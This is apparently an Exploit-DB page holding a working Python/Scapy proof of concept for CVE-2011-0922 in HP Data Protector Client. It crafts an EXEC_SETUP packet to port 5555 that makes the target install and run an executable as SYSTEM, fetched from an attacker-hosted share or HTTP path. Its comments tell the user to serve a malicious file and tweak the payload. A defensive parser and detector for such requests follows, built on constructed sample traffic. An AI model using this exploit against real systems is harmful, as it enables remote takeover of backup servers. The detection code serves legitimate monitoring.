
HP Data Protector Client EXEC_SETUP Code Execution

Posted on 30 May 2011

# Exploit Title: HP Data Protector Client EXEC_SETUP Remote Code Execution Vulnerability PoC (ZDI-11-056)
# Date: 2011-05-29
# Author: fdisk
# Version: 6.11
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# The following PoC instructs an HP Data Protector Client to download and install an .exe file. It tries to get the file
# from a share (\\pwn2003se.home.it) and if it fails it tries to access the same file via HTTP. To get the PoC working with
# this payload share a malicious file via HTTP under http://pwn2003se.home.it/Omniback/i386/installservice.exe.exe and you are done.
# Tweak payload to better suit your needs.
#
# Since you're crafting packets with Scapy don't forget to use iptables to block the outbound resets or your host will
# reset your connection after receiving an unsolicited SYN/ACK that is not associated with any open session/socket. Have Fun.
#
# Special thanks to all the Exploit-DB Dev Team.

import sys
from scapy.all import *

if len(sys.argv) != 2:
    print("Usage: ./ZDI-11-056.py <Target IP>")
    sys.exit(1)

target = sys.argv[1]

# Two inet frames, each a 4-byte big-endian length followed by UTF-16LE text
# (BOM first) whose fields are separated by NUL characters.
payload = (
    # frame 1 (0x1be bytes): "2", host, "0", "SYSTEM", "NT AUTHORITY", "C", "26",
    # then the installservice.exe command line with its UNC -source paths
    b"\x00\x00\x01\xbe"
    b"\xff\xfe\x32\x00\x00\x00\x20\x00\x70\x00\x77\x00\x6e\x00\x32\x00"
    b"\x30\x00\x30\x00\x33\x00\x73\x00\x65\x00\x2e\x00\x68\x00\x6f\x00"
    b"\x6d\x00\x65\x00\x2e\x00\x69\x00\x74\x00\x00\x00\x20\x00\x30\x00"
    b"\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
    b"\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
    b"\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
    b"\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
    b"\x5c\x00\x70\x00\x77\x00\x6e\x00\x32\x00\x30\x00\x30\x00\x33\x00"
    b"\x53\x00\x45\x00\x2e\x00\x68\x00\x6f\x00\x6d\x00\x65\x00\x2e\x00"
    b"\x69\x00\x74\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
    b"\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
    b"\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
    b"\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
    b"\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
    b"\x72\x00\x63\x00\x65\x00\x20\x00\x5c\x00\x5c\x00\x70\x00\x77\x00"
    b"\x6e\x00\x32\x00\x30\x00\x30\x00\x33\x00\x53\x00\x45\x00\x2e\x00"
    b"\x68\x00\x6f\x00\x6d\x00\x65\x00\x2e\x00\x69\x00\x74\x00\x5c\x00"
    b"\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00"
    b"\x20\x00\x00\x00\x20\x00\x5c\x00\x5c\x00\x70\x00\x77\x00\x4e\x00"
    b"\x32\x00\x30\x00\x30\x00\x33\x00\x53\x00\x45\x00\x5c\x00\x4f\x00"
    b"\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
    b"\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
    b"\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
    b"\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
    b"\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
    b"\x5c\x00\x5c\x00\x70\x00\x77\x00\x4e\x00\x32\x00\x30\x00\x30\x00"
    b"\x33\x00\x53\x00\x45\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00"
    b"\x62\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00"
    # frame 2: its length header is the two zero bytes above plus 0x0254;
    # fields: "26", "[0]ADD/UPGRADE", the UNC install directory and the
    # INSTALLATIONTYPE/CELLNAME/... setup parameters
    b"\x02\x54"
    b"\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
    b"\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
    b"\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c\x00\x70\x00\x77\x00"
    b"\x6e\x00\x32\x00\x30\x00\x30\x00\x33\x00\x53\x00\x45\x00\x2e\x00"
    b"\x68\x00\x6f\x00\x6d\x00\x65\x00\x2e\x00\x69\x00\x74\x00\x5c\x00"
    b"\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00"
    b"\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00\x0a\x00\x49\x00\x4e\x00"
    b"\x53\x00\x54\x00\x41\x00\x4c\x00\x4c\x00\x41\x00\x54\x00\x49\x00"
    b"\x4f\x00\x4e\x00\x54\x00\x59\x00\x50\x00\x45\x00\x3d\x00\x22\x00"
    b"\x43\x00\x6c\x00\x69\x00\x65\x00\x6e\x00\x74\x00\x22\x00\x20\x00"
    b"\x43\x00\x45\x00\x4c\x00\x4c\x00\x4e\x00\x41\x00\x4d\x00\x45\x00"
    b"\x3d\x00\x22\x00\x70\x00\x77\x00\x6e\x00\x32\x00\x30\x00\x30\x00"
    b"\x33\x00\x73\x00\x65\x00\x2e\x00\x68\x00\x6f\x00\x6d\x00\x65\x00"
    b"\x2e\x00\x69\x00\x74\x00\x22\x00\x20\x00\x43\x00\x45\x00\x4c\x00"
    b"\x4c\x00\x43\x00\x4c\x00\x49\x00\x45\x00\x4e\x00\x54\x00\x4e\x00"
    b"\x41\x00\x4d\x00\x45\x00\x3d\x00\x22\x00\x73\x00\x65\x00\x63\x00"
    b"\x75\x00\x72\x00\x6e\x00\x65\x00\x74\x00\x2d\x00\x62\x00\x32\x00"
    b"\x75\x00\x64\x00\x66\x00\x76\x00\x2e\x00\x68\x00\x6f\x00\x6d\x00"
    b"\x65\x00\x2e\x00\x69\x00\x74\x00\x22\x00\x20\x00\x41\x00\x4c\x00"
    b"\x4c\x00\x55\x00\x53\x00\x45\x00\x52\x00\x53\x00\x3d\x00\x35\x00"
    b"\x20\x00\x49\x00\x4e\x00\x53\x00\x54\x00\x41\x00\x4c\x00\x4c\x00"
    b"\x44\x00\x49\x00\x52\x00\x3d\x00\x22\x00\x24\x00\x28\x00\x4f\x00"
    b"\x4d\x00\x4e\x00\x49\x00\x42\x00\x41\x00\x43\x00\x4b\x00\x29\x00"
    b"\x5c\x00\x22\x00\x20\x00\x50\x00\x52\x00\x4f\x00\x47\x00\x52\x00"
    b"\x41\x00\x4d\x00\x44\x00\x41\x00\x54\x00\x41\x00\x3d\x00\x22\x00"
    b"\x24\x00\x28\x00\x44\x00\x41\x00\x54\x00\x41\x00\x4f\x00\x4d\x00"
    b"\x4e\x00\x49\x00\x42\x00\x41\x00\x43\x00\x4b\x00\x29\x00\x5c\x00"
    b"\x22\x00\x20\x00\x49\x00\x4e\x00\x45\x00\x54\x00\x50\x00\x4f\x00"
    b"\x52\x00\x54\x00\x3d\x00\x35\x00\x35\x00\x35\x00\x35\x00\x20\x00"
    b"\x41\x00\x44\x00\x44\x00\x4c\x00\x4f\x00\x43\x00\x41\x00\x4c\x00"
    b"\x3d\x00\x63\x00\x6f\x00\x72\x00\x65\x00\x2c\x00\x6a\x00\x61\x00"
    b"\x76\x00\x61\x00\x67\x00\x75\x00\x69\x00\x20\x00\x4f\x00\x50\x00"
    b"\x54\x00\x5f\x00\x44\x00\x4e\x00\x53\x00\x43\x00\x48\x00\x45\x00"
    b"\x43\x00\x4b\x00\x3d\x00\x31\x00\x20\x00\x4f\x00\x50\x00\x54\x00"
    b"\x5f\x00\x53\x00\x4b\x00\x49\x00\x50\x00\x49\x00\x4d\x00\x50\x00"
    b"\x4f\x00\x52\x00\x54\x00\x3d\x00\x31\x00\x20\x00\x4f\x00\x50\x00"
    b"\x54\x00\x5f\x00\x4d\x00\x53\x00\x47\x00\x3d\x00\x31\x00\x0a\x00"
    b"\x00\x00\x00\x00"
)

ip = IP(dst=target)
# Hand-rolled handshake: scapy's TCP seq defaults to 0, so our data starts at seq=1
SYN = TCP(sport=31337, dport=5555, flags="S")
packet = ip / SYN
SYNACK = sr1(packet)
my_ack = SYNACK.seq + 1
print(SYNACK.seq)
print(my_ack)
ACK = TCP(sport=31337, dport=5555, flags="A", seq=1, ack=my_ack)
send(ip / ACK)
PUSH = TCP(sport=31337, dport=5555, flags="PA", seq=1, ack=my_ack)
send(ip / PUSH / payload)
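For anyone who has to spot this request in a capture or on a sensor rather than send it, the following parser and detection helper is added here as an example; it is not part of fdisk's PoC, nor HP's code, and it sends nothing. Everything it assumes about the wire format is read off the payload above rather than from HP documentation: each inet frame is a 4-byte big-endian length followed by UTF-16 text that starts with a BOM and separates fields with NUL characters, the seventh field of the request carries the opcode, and 26 is the opcode the page title calls EXEC_SETUP. The sample traffic, the placeholder hostnames and the placeholder opcode 99 are constructed for the example.

```python
import struct

# Framing assumed from the payload above (not from HP documentation):
# 4-byte big-endian length, then that many bytes of UTF-16 text that starts
# with a BOM and uses NUL characters as field separators.
OPCODE_INDEX = 6            # position of the " 26" field in the request above
EXEC_SETUP_OPCODE = "26"    # assumed: the opcode the page title calls EXEC_SETUP


def parse_stream(data):
    """Split a raw TCP payload into inet frames, each a list of stripped fields.

    A trailing frame whose declared length exceeds the bytes available is
    left alone so a caller can re-run this once more data has arrived."""
    messages = []
    offset = 0
    while offset + 4 <= len(data):
        (length,) = struct.unpack(">I", data[offset:offset + 4])
        body = data[offset + 4:offset + 4 + length]
        if len(body) < length:
            break
        # The "utf-16" codec reads the BOM and picks the byte order from it.
        text = body.decode("utf-16", errors="replace")
        fields = [f.strip(" ") for f in text.split("\x00")]
        while fields and fields[-1] == "":
            fields.pop()            # drop the NUL padding at the end of the frame
        messages.append(fields)
        offset += 4 + length
    return messages


def find_exec_setup(messages):
    """Flag EXEC_SETUP requests and note whether the install source is a UNC
    path, i.e. a binary the client would fetch from another host.

    The user and domain fields are supplied by the peer and are not
    authenticated, so the request is worth an alert whatever they claim."""
    findings = []
    for fields in messages:
        if len(fields) <= OPCODE_INDEX or fields[OPCODE_INDEX] != EXEC_SETUP_OPCODE:
            continue
        args = fields[OPCODE_INDEX + 1:]
        findings.append({
            "peer_host": fields[1],
            "claimed_user": "%s\\%s" % (fields[4], fields[3]),
            "remote_source": any(a.startswith("\\\\") for a in args),
            "args": args,
        })
    return findings


def build_message(fields):
    """Test fixture only (constructed here): frame a list of fields the way
    the payload above is framed, so the parser can be exercised offline."""
    text = "\x00".join(fields) + "\x00\x00"
    body = b"\xff\xfe" + text.encode("utf-16-le")
    return struct.pack(">I", len(body)) + body


# Constructed sample traffic: an EXEC_SETUP request modelled on the one above
# (hostnames replaced by placeholders), an unrelated request with a
# placeholder opcode, and finally the start of a frame that has not fully arrived.
SAMPLE_STREAM = (
    build_message(["2", " rogue-host.example", " 0", " SYSTEM", " NT AUTHORITY",
                   " C", " 26",
                   " \\\\rogue-host.example\\Omniback\\i386\\installservice.exe"
                   " -source \\\\rogue-host.example\\Omniback "])
    + build_message(["2", " client-a.example", " 0", " backupop", " CORP",
                     " C", " 99", " placeholder-argument"])
)
TRUNCATED_TAIL = b"\x00\x00\x00\x10\xff\xfe"   # claims 16 bytes, delivers 2


if __name__ == "__main__":
    for hit in find_exec_setup(parse_stream(SAMPLE_STREAM + TRUNCATED_TAIL)):
        print("EXEC_SETUP from %s as %s, remote source: %s"
              % (hit["peer_host"], hit["claimed_user"], hit["remote_source"]))
```

Run over the constructed stream it reports one EXEC_SETUP request whose install source is a UNC path, ignores the request with the other opcode, and leaves the incomplete trailing frame for the next read. Feeding it reassembled TCP payloads to port 5555 is enough to turn it into a simple alert; the claimed NT AUTHORITY\SYSTEM identity in the request is exactly the kind of peer-supplied value a sensor should log but never trust.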

